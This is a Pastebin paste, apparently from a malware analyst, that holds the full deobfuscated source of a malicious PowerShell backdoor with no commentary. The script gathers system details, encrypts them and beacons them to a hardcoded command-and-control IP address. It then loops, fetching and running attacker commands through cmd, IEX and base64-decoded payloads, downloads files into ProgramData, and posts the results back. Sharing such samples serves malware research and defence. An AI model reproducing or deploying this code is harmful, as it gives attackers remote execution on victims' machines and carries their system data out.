API tools faq
paste
dissectmalware

Mal PowerShell after 36 round decoding

dissectmalware
Mar 3rd, 2019
579
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 8.72 KB | None | 0 0
raw download clone embed print report
  1. $global:url = ""$global:id = ""$cevingr = 959, 713$choyvp = 37, 437$C = @('http://162.223.89.53')function Zbq($x, $H, $n){    $Xi = $x    $Ei = $H    $Yi = 1    while($Ei -gt 0){        if(($Ei % 2) -eq 0) {            $Xi = ($Xi * $Xi) % $n            $Ei = $Ei / 2        } else {            $Yi = ($Xi * $Yi) % $n            $Ei = $Ei - 1        }    }    return $Yi}function raPelcg($pk, $cynvagrkg){    try{        $xrl, $n = $pk;        $zlneenl = @();        for($i=0; $i -lt $cynvagrkg.Length; $i++){            $ahz = [int][char]$cynvagrkg[$i]            $t = Zbq $ahz $xrl $n            $zlneenl += $t        }        return $zlneenl    }    catch{        trgEnaqbzCebkl    }}function qrPelcg($pk, $pvcuregrkg){    try{         $xrl, $n = $pk;         $zl_neenl = @();         for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){            $ahz = [int]$pvcuregrkg[$i]            $t =  Zbq $ahz $xrl $n            $zl_neenl += [convert]::ToChar([int]$t)         }         return -join $zl_neenl       }    catch{trgEnaqbzCebkl       }}function uggcCBFG($hey,$rap_zft){    trgEnaqbzCebkl try{$pbagrag = $rap_zft$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag);$jroerd.Method = "POST";$jroerd.ContentLength = $rapbqr_qngn.length;        $jroerd.ContentType = "application/json"if ($rapbqr_qngn.Length -gt 0){$erd_fgernz = $jroerd.GetRequestStream();$erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length);}[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 -Maximum 40)}return $erfhyg}function uggcTRG($hey){    trgEnaqbzCebkltry{$jroerd = [System.Net.WebRequest]::Create($global:url + $hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}} catch {$erfhyg = "error"        write-host $hey "`t" ($global:url + $_.Exception.Message)        trgEnaqbzCebkl        start-sleep (Get-Random -Minimum 20 -Maximum 40)}return $erfhyg  }function fuggcTRG($hey){try{$jroerd = [System.Net.WebRequest]::Create($hey);$jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()$jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials$jroerd.Method = "GET";[System.Net.WebResponse] $erfc = $jroerd.GetResponse();if ($erfc -ne $null){$qngn = $erfc.GetResponseStream();[System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn;[String] $erfhyg = $erf_qngn.ReadToEnd();}}catch {    $erfhyg = ""}return $erfhyg  }function Riny($pzq){    try{        $bhg = IEX $pzq -ErrorAction SilentlyContinue        if($pzq.StartsWith("cd")){$bhg = $PWD;}        $bhg = ($bhg | Out-String)    } catch {        $bhg = $_.Exception.Message    }    return $bhg}function vasbvavg(){    function trgVC(){    try{    $vcf = ""    Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | Where{$_.IPAddress[0] -NotLike '169*'} | % {$vcf = $vcf + "-" + $_.IPAddress[0]}    return $vcf.substring(1);    } catch {    return "ErrorIP";    }    }    function trgBF(){    try{    return (Get-WmiObject Win32_OperatingSystem).Name;    } catch {    return "ErrorOS";    }    }    function trgNepu(){    try{    return  (Get-WmiObject Win32_OperatingSystem).OSArchitecture;    } catch {    return "ErrorArch";    }    }    function trgQbznva(){    try{    return (Get-WmiObject Win32_ComputerSystem).Domain;    } catch {    return "ErrorDomain";    }    }    function trgUbfgAnzr(){    try{    return (Get-WmiObject Win32_ComputerSystem).Name;    } catch {    return "ErrorHostName";    }    }    function trgHfreanzr(){        try{            try{                $sfb = New-Object -ComObject Scripting.FileSystemObject;                $hfre = $env:UserName                $ghfre = $hfre.replace('[^a-zA-Z0-9]','')                if($ghfr -eq $hfre){                    return $hfre                }                return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName)            } catch {                return $env:UserName            }         } catch {            return "-"        }    }    function vfNqzva(){        try{            $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent()            $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl)            $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator            if ($Cevapvcny.IsInRole($NqzvaEbyr))            {                return '+'            }            else            {                return ''            }        } catch {            return ""          }    }    function trgCVC(){        try{            $ernyVC = fuggcTRG "http://ipv4bot.whatismyipaddress.com/"            return $ernyVC        } catch {            return "ErrorPublicIP"          }    }    $FlfVasb = trgBF    $FlfVasb += "**"    $FlfVasb += trgVC    $FlfVasb += "**"    $FlfVasb += trgNepu    $FlfVasb += "**"    $FlfVasb += trgUbfgAnzr    $FlfVasb += "**"    $FlfVasb += trgQbznva    $FlfVasb += "**"    $FlfVasb += vfNqzva    $FlfVasb += trgHfreanzr    $FlfVasb += "**"    $FlfVasb += trgCVC    $global:id = zq5trarengbe($FlfVasb)    return ($global:id + '**' + $FlfVasb)}function zq5trarengbe($fgeVa){    $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider    $hgs8 = new-object -TypeName System.Text.UTF8Encoding    $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa)))    $bhgchg = $unfu.replace('-','')    return $bhgchg}function pbzznaq_naq_pbageby($pzq){    try{            if($pzq.StartsWith('upload')){        try{                $pzq=$pzq.replace('upload ','')            $wc = New-Object System.Net.WebClient                $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()                $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials          $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf('/'),$pzq.Length-$pzq.LastIndexOf('/'))))        return Riny "pwd"         }catch{         return $_.Exception.Message        }         }        elseif($pzq.StartsWith('cmd')){            $pzq=$pzq.replace('cmd ','')            try{                $bhg = cmd /c $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        elseif($pzq.StartsWith('b64')){            $pzq=$pzq.replace('b64 ','')            try{                $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq))                $bhg = Riny $pzq                $bhg = $bhg | Out-String                return $bhg            } catch {                return $_.Exception.Message            }        }        else {            return Riny $pzq        }    }    catch{        return $_.Exception.Message    }}function trgEnaqbzCebkl(){$eaq = Get-Random -minimum 0 -maximum ($C.Length)$global:url = $C[$eaq]}function ertChfu([string]$p, [string]$k, [string]$v){    try{        New-ItemProperty -Path $p -Name $k -Value $v -Force -ErrorAction SilentlyContinue | Out-Null    }    catch {                return "error"    }}function ertvfgre(){    while($true) {Write-Host "R-I"        $vasb = vasbvavg        $vasb = raPelcg $cevingr $vasb        $vasb = ('{"data":"' + $vasb + '"}')                $vasb = uggcCBFG ("/oa/") $vasb        if($vasb -eq '"done"'){            break        } else {            start-sleep 30        }        Write-Host "R-O"    }}ertvfgrewhile($true){    write-host "W-I"    try{$pzq = uggcTRG ("/oc/api/?t=" + $global:id)if ($pzq.Length -gt 0){            $pzq = $pzq.substring(1,$pzq.Length-2)$pzq = $pzq -split "~~!!~~"            $pvq = $pzq[0]            $pzq = $pzq[1]                        $erfhyg = pbzznaq_naq_pbageby $pzq            if($erfhyg.Length -le 1){                $erfhyg = "NULL"            }            $erfhyg = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($erfhyg))            $erfhyg = ($pvq + ':' + $erfhyg)            $nqqe = ('/or/?t=' + $global:id)            $qngn = ('{"data":"' + $erfhyg + '"}')    $erfhyg = uggcCBFG $nqqe $qngn        }    }    catch{        trgEnaqbzCebkl        continue    }    write-host "W-O"    start-sleep 300}
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!